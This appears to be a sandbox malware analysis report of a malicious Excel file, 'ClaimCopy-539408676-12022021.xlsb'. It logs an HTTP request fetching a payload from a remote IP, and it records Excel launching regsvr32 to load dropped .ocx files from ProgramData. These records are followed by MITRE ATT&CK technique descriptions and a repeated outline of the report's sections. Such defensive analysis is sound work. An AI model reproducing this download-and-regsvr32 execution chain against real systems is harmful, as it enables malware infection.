disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Dec 2, 2021 16:18:22.625663996 CET	1185	OUT	GET /939602286691.dat2 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 45.142.211.62 Connection: Keep-Alive
Dec 2, 2021 16:18:22.811156988 CET	1186	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Thu, 02 Dec 2021 15:18:23 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6996 Parent PID: 800

General

Start time:	16:18:11
Start date:	02/12/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x1340000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 5972 Parent PID: 6996

General

Start time:	16:18:23
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 C:\ProgramData\Volet1.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6440 Parent PID: 6996

General

Start time:	16:18:24
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 C:\ProgramData\Volet2.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6468 Parent PID: 6996

General

Start time:	16:18:24
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 C:\ProgramData\Volet3.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6464 Parent PID: 6996

General

Start time:	16:18:25
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet4.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6536 Parent PID: 6996

General

Start time:	16:18:26
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet5.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: regsvr32.exe PID: 6516 Parent PID: 6996

General

Start time:	16:18:26
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32 -e -n -i:&Tiposa!G22& C:\ProgramData\Volet6.ocx
Imagebase:	0xc0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report ClaimCopy-539408676-12022021.xlsb

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "ClaimCopy-539408676-12022021.xlsb"

Indicators

Macro 4.0 Code

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: EXCEL.EXE PID: 6996 Parent PID: 800

General

Analysis Process: regsvr32.exe PID: 5972 Parent PID: 6996

General

Analysis Process: regsvr32.exe PID: 6440 Parent PID: 6996

General

Analysis Process: regsvr32.exe PID: 6468 Parent PID: 6996